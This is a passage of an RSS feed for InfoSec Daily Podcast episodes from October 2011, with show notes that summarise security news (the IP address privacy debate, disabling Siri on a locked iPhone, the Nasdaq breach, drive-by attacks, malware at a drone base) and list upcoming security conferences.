style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">in his judgement published in June</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, agreed with the Commissioner (but on different grounds).</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cranston J argued that to consider the requested data as personal data would establish a principle, which would prevent any publication of medical statistics, however broad. To justify his position, he then went on to examine whether identifiability was likely (a) in the hands of the data controller and (b) in the hands of recipients who get the statistics.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He was satisfied that if identification in the hands of the recipient was &ldquo;extremely remote&rdquo;, then the information was not personal data.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Now we come to the difference that distinguishes the disclosure of statistics and the disclosure of IP addresses. With the former, the data controller might be able to identify an individual from the statistics in conjunction with other information in its possession. By contrast, the recipient of the statistical data, following the logic of Cranston J, is remote from making such an identification.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This starkly contrasts with the disclosure or capture of IP addresses. Although an individual cannot be identified from just the IP address, the user or recipient of that IP address has every intent to identify a potential customer as part of his marketing purpose.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Additionally, the holder of the IP address knows that in the hands of the ISP, the IP address definitely forms part of a collection of personal data. With statistics, this point might not be so clear-cut: for instance the public authority might create a set of statistics for release under FOI where it cannot perform the back-identification.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That is why I am increasingly drawn to the conclusion that IP addresses have to be treated as personal data by behavioral marketers, as there is a prior intent to identify the individual behind the IP address.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">I am also coming to the conclusion that ISPs can do more to protect their customers from unwanted marketing, especially if they own a block of IP addresses.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.tuaw.com/2011/10/20/iphone-101-disable-siri-with-iphone-passcode-to-prevent-unautho/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.tuaw.com/2011/10/20/iphone-101-disable-siri-with-iphone-passcode-to-prevent-unautho/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Even when they had a passcode set on the lock screen, someone could pick up their device and issue commands to Siri. This means that unauthorized persons can easily pick up the iPhone 4S, press and hold the Home button and converse with Siri. Fortunately, there&#39;s a way to disable Siri while using a lock screen passcode.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><a href="http://nakedsecurity.sophos.com/2011/10/19/siri-iphone-4s-unlocked/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Sophos Naked Security blog</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> noted that those unauthorized users can do everything from writing an email or sending a text message to maliciously changing calendar appointments. Blogger Graham Cluely notes that it&#39;s easy to disable Siri while there&#39;s a passcode in effect, and wonders why Apple didn&#39;t set the iPhone 4S up that way by default.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To make sure Siri is deaf to commands when there&#39;s a passcode on the iPhone 4S, enter Settings &gt; General &gt; Passcode Lock, and slide the Siri option to Off. Now, when your friends try to make a prank call to your girlfriend using your iPhone 4S, they&#39;ll find that Siri is unwilling to be a participant in the prank.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://old.news.yahoo.com/s/nm/20111020/wr_nm/us_nasdaq_hacking"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://old.news.yahoo.com/s/nm/20111020/wr_nm/us_nasdaq_hacking</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hackers who infiltrated the Nasdaq&#39;s computer systems installed malicious software on the exchange&#39;s computers that allowed them to spy on scores of directors of publicly held companies, according to two people familiar with an investigation into the matter.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The emerging details further highlight the increasing threat hackers pose to corporations with a rash of highly sophisticated attacks on high-profile companies and financial institutions &#8212; from Google Inc to Citigroup Inc and the International Monetary Fund.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nasdaq OMX Group disclosed in February that its system were hacked last year. That sparked an investigation involving the FBI and National Security Agency that is ongoing.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The attack on Nasdaq is an example of a &quot;blended attack,&quot; where hackers infiltrate one target in order to facilitate access to another. In March hackers stole digital security keys from EMC Corp&#39;s RSA Security division that they later used to access the networks of defense contractor Lockheed Martin Corp.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nasdaq&#39;s trading platforms were not compromised, the exchange said when it disclosed the attack in February, although an Internet-based software program was attacked.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Nasdaq sells that program, called Directors Desk, to listed and private companies, which use it to let board members get access to and share documents and communicate with executives, among other things.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While the Directors Desk was infected, hackers were able to access confidential documents and communications of the directors who got access to the program, said Tom Kellermann, chief technology officer with security technology firm AirPatrol Corp.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Another person familiar with the investigation confirmed Kellermann&#39;s account of the matter, but declined to be identified by name because he is not authorized to discuss the matter.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://informationweek.com/news/government/security/231901310"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://informationweek.com/news/government/security/231901310</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Department of Homeland Security (DHS) has tapped a former energy executive to work with cybersecurity partners across the country on issues that affect the federal government.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DHS secretary Janet Napolitano appointed Mark Weatherford, most recently VP and chief security officer of the North American Electric Reliability Corporation (NERC), as the department&#39;s new deputy undersecretary for cybersecurity for the National Protection and Programs Directorate (NPPD). NERC is an organization aimed at ensuring the reliability of North American power grids. The DHS NPPD is in charge of reducing threats to U.S. citizens, both physical and cyber.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NPPD undersecretary Rand Beers revealed the appointment in a </span><a href="http://blog.dhs.gov/2011/10/secretary-napolitano-appoints-mark.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">DHS blog post</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. The DHS created the new position last month to complement the role of NPPD deputy undersecretary Suzanne Spaulding, who was appointed last month, according to an internal email by Beers obtained by InformationWeek.</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While Spaulding focuses on reducing risk and bolstering the cybersecurity of U.S. critical infrastructure and federal facilities, including federal identity management and verification efforts, the new cybersecurity role will have an external focus, Beers said.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Weatherford will be in charge of ensuring the NPPD engages in &quot;robust operations and strengthened partnerships in the constantly evolving field of cybersecurity,&quot; Beers said in the e-mail. The role entails working with private-sector partners to strengthen the overall cybersecurity position of the United States.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://threatpost.com/en_us/blogs/hackers-targeting-iframe-attacks-p-sites-102011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/hackers-targeting-iframe-attacks-p-sites-102011</span></a><br />
	<a href="http://nakedsecurity.sophos.com/2011/10/19/analysis-of-compromised-web-sites-hacked-php-scripts/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/10/19/analysis-of-compromised-web-sites-hacked-php-scripts/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amid an increase in defacements of legitimate websites over the past few weeks, Fraser Howard, a researcher from Sophos, has discovered that the groups behind the attacks are increasingly using sophisticated filtering and dynamic content to avoid detection by search engines and web filtering firms.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">If an older generation of drive-by Web attacks were dumb, this new generation is intelligent, Howard said. According to his report, many sites that Sophos found hosting attacks are using complex logic to limit who is served malicious content include &#8211; or block &#8211; malicious code injection depending on the source of Web traffic requests to the compromised sites.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Howard&#39;s study of the malicious payloads found logic that allowed the attackers to automatically check for requests from bot-infected hosts versus uninfected hosts or search engine Web crawlers. The goal was to serve malicious attacks (either iFrame attacks or malicious Javascript) to uninfected hosts, while steering clear of search engines or other monitoring outfits looking to blacklist compromised pages. The code analyzed by Howard included local IP blacklists that ensured &nbsp;search engine bots were only served clean HTML pages, while users who had already been hit didn&#39;t get reinfected, which Howard says makes it harder to investigate the problem.</span></p>
<p>
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="https://infosecisland.com/blogview/17473-Air-Force-Drones-Were-Hit-by-Online-Gaming-Malware.html"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://infosecisland.com/blogview/17473-Air-Force-Drones-Were-Hit-by-Online-Gaming-Malware.html</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The malware that hit Creech Air Force Base was a credential stealer and not a keylogger as originally thought, and the drone remote piloted computers were never at risk according to a media release from the Air Force.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report claims that the malware was detected on September 15th and isolated by the 24th Air Force using standard monitoring and protection procedures. The malware was also quarantined to prevent infection of additional systems:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The malware was detected on a stand-alone mission support network using a Windows-based operating system. The malware in question is a credential stealer, not a keylogger, found routinely on computer networks and is considered more of a nuisance than an operational threat. &nbsp;It is not designed to transmit data or video, nor is it designed to corrupt data, files or programs on the infected computer. &nbsp;Our tools and processes detect this type of malware as soon as it appears on the system, preventing further reach.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The report also states that the ground control system was infected, which is separate from the machines that are used to fly the UAV&rsquo;s. The UAV pilot systems were not at risk:</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The infected computers were part of the ground control system that supports RPA operations. The ground system is separate from the flight control system Air Force pilots use to fly the aircraft remotely; the ability of the RPA pilots to safely fly these aircraft remained secure throughout the incident.&quot;</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apparently, the UAV drone system were not the target of the malware. Instead, according to an </span><a href="http://abcnews.go.com/Technology/wireStory/military-computer-virus-directed-drones-14725058"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">anonymous defense official</span></a><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the malware discovered was the kind that is &ldquo;routinely used to steal log-in and password data from people who gamble or play games like Mafia Wars online.&rdquo;</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The next question would be, is online gaming and surfing allowed on the systems in this area? It is common for tech savvy employees to use ssh tunneling to bypass restrictive outbound firewall policies.</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-499-ip-pii-diasble-siri-nasdaq-update-dhs-appointment-drive-by-attacks-drone-update/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/2990/0/infosec-daily-podcast-episode-499.mp3" length="18056190" type="audio/mpeg" />
		<itunes:duration>0:37:34</itunes:duration>
		<itunes:subtitle>
	InfoSec Daily Podcast Episode 499 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad and Keith Pachulski.
	Announcements:
	Hack3rCon 2011
	When: October 21-[...]</itunes:subtitle>
		<itunes:summary>
	InfoSec Daily Podcast Episode 499 for October 20, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad and Keith Pachulski.
	Announcements:
	Hack3rCon 2011
	When: October 21-23rd, 2011
	Where: the Charleston House Hotel and Conference Center
	http://www.hack3rcon.org/
	NordSec 2011
	When: October 26&#8211;28, 2011
	Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia
	http://nordsec2011.cyber.ee/
	New Hampshire InfoSec Tweetup
	When: October 29, 2011
	Where: Pawtuckaway State Park in Nottingham, NH
	http://nhinfosectweetup.eventbrite.com/ 
	( It is just a gathering of security professionals and their families. &#160;No talks, just abunch of likeminded people and some good food.)
	SkyDogCon
	When: Nov 4th &#8211; Nov 6th
	Where: Holiday Inn Airport, Nashville, TN
	http://www.skydogcon.com
	Phreaknic
	When: Nov 4th &#8211; Nov 6th
	Where: Days Inn Stadium, Nashville, TN
	http://www.phreaknic.info
	BsidesATL 2011
	When: November 4th, 2011
	Where: Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).
	http://www.securitybsides.com/w/page/44893559/BSidesATL-2011
	This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &#160;Of course all day Podcast Area.
	BSidesDFW 2011
	When: November 5th, 2011
	Where: Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source: http://www.theregister.co.uk/2011/10/20/are_ip_addresses_personal_data/
	Let&#8217;s revisit that old chestnut: &#8220;Is an IP address you use in an internet session personal data about you?&#8221; The reason: I have just come across two legal references which relate to copyright infringement where the argument that an IP address is personal data was accepted.
	The first reference I found was the Monetary Penalty Notice that ACS Law obtained (and the &#163;200K fine that later became a &#163;1k fine&#8230;). The company used to send ISPs a list of IP addresses suspected of being involved in breaches of copyright on a regular basis. (The company went out of business because of its poor security, which is why the eventual penalty was reduced to &#163;1K).
	In the ACS Law Monetary Penalty Notice, the Information Commissioner&#39;s Office (ICO) clearly states:
	The Commissioner understands that the data requests sent to each ISP by the data controller (in this case) were for information populating a spreadsheet containing hundreds and sometimes thousands of IP addresses. &#8230; ISPs responded to the data controller by returning the spreadsheet with all the existing data, together with the name and address of the registered account holder that they had input alongside each entry.
	So the ISPs mentioned above, presumably because they have blocks of IP addresses specifically allocated to them, were able to provide a link between a requested IP address and a specific individual account-holder. In this way, the IP address formed part of the personal data each ISP had in its possession.
	This point was reinforced with a judicial review concerning the Digital Economy Act 2010, where it was claimed by many organiSations that some regulations enacted by Government were incompatible with a number of provisions [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 498 &#8211;  More Mac Malware, VNC Bios, Siri’s Side Entrance, EFF Silk, SpiPhone &amp; Remembering</title>
		<link>http://www.isdpodcast.com/episode-498-more-mac-malware-vnc-bios-siri%e2%80%99s-side-entrance-eff-silk-spiphone-remembering</link>
		<comments>http://www.isdpodcast.com/episode-498-more-mac-malware-vnc-bios-siri%e2%80%99s-side-entrance-eff-silk-spiphone-remembering#comments</comments>
		<pubDate>Thu, 20 Oct 2011 00:51:23 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=2983</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 498 for October 19, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, and Boris Sverdlik. Announcements: Hack3rCon 2011 When: October 21-23rd, 2011 Where: the Charleston House Hotel and Conference Center http://www.hack3rcon.org/ NordSec 2011 When: October 26&#8211;28, 2011 Where: Tallinn Science Park &#8220;Tehnopol&#8221;, Tallinn, Estonia http://nordsec2011.cyber.ee/ New Hampshire InfoSec Tweetup When: October [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 498 for October 19, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, and Boris Sverdlik.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 21-23rd, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: the Charleston House Hotel and Conference Center</span><br />
	<a href="http://www.hack3rcon.org/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.hack3rcon.org/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">NordSec 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26&ndash;28, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Tallinn Science Park &ldquo;Tehnopol&rdquo;, Tallinn, Estonia</span><br />
	<a href="http://nordsec2011.cyber.ee/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nordsec2011.cyber.ee/</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New Hampshire InfoSec Tweetup</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 29, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#202020;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Pawtuckaway State Park in Nottingham, NH</span><br />
	<a href="http://nhinfosectweetup.eventbrite.com/%20"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nhinfosectweetup.eventbrite.com/ </span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">( It is just a gathering of security professionals and their families. &nbsp;No talks, just a bunch of likeminded people and some good food.)</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SkyDogCon</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Holiday Inn Airport, Nashville, TN</span><br />
	<a href="http://www.skydogcon.com/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Phreaknic</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Nov 4th &#8211; Nov 6th</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Days Inn Stadium, Nashville, TN</span><br />
	<a href="http://www.phreaknic.info/"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.phreaknic.info</span></a></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BsidesATL 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 4th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> Think Inc World HQ, 1375 Peachtree St. Suite 600, Atlanta, Ga (The Earthlink Bldg).</span></a><br />
	<a href="http://www.securitybsides.com/w/page/44893559/BSidesATL-2011"><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/44893559/BSidesATL-2011</span></a><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This year there will be 3 tracks, a CISO panel on some good topics recently (Hacker vs Biz Skillset, etc), Lockpick Village by FALE, Prize Giveaway at End. &nbsp;Of course all day Podcast Area.</span></p>
<p>	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSidesDFW 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 5th, 2011</span><br />
	<span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where:</span><a href="http://www.microsoft.com/en-us/mtc/locations/dallas.aspx"><span style="font-size:11pt;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:11pt;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Microsoft Technology Center Dallas</span></a><br />
